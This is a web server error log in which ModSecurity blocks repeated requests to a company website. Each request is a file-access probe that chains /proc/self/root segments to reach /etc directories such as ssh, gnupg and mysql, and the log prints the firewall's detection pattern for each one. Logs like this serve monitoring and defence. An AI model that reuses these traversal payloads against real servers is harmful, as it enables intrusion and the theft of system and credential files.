[Wed Mar 18 09:14:16.280123 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:34222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXGMdf6f5d65gmYZTE7gAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:14:17.636930 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:42540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXGfu8EFLIOrSqIpv1egAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:14:18.954626 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:42546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXGta6ubjKNq_cu4aJQAAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:14:20.287301 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:56282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXHAkwaGbbGflqUZAA0wAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:14:22.718696 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:56290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXHuyqAr6etmhZHNqu1AAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:14:26.383373 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:58172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXIta6ubjKNq_cu4aJRwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:14:30.092595 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:56298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXJgkwaGbbGflqUZAA3AAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:14:33.658592 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:42034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXKew_le52K8_3pV3QAQAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:14:36.005366 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:42042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXLCmAPhZkrhU8w4ldrAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:14:36.009966 2026] [mime_magic:error] [pid 15051:tid 140411599251200] (70014)End of file found: [client 74.7.243.128:42042] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:14:50.103681 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.241.31:39084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXOkzinOy1jxa1j4cEeQAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:14:57.762865 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:42056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXQda6ubjKNq_cu4aJZgAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:15:01.180058 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:38896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXRfu8EFLIOrSqIpv1jgAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:15:09.712275 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.241.31:38488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXTSmAPhZkrhU8w4ldzgAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:15:12.547340 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:49576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXUNY0UrI5A3LftIyT2AAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:15:14.893682 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:49584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXUuoXxyEfFpUF8f9euAAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:15:19.629074 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:49592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXV8df6f5d65gmYZTFFQAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:15:22.053691 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:48728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXWuw_le52K8_3pV3QHgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:15:22.683838 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:53798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXWuyqAr6etmhZHNqu_gAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:15:29.393897 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:40230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXYSmAPhZkrhU8w4ld3gAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:15:32.915578 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:48738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXZAkwaGbbGflqUZAA_gAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:15:35.111078 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:36370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXZ9a6ubjKNq_cu4aJgQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:15:56.815082 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:36380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 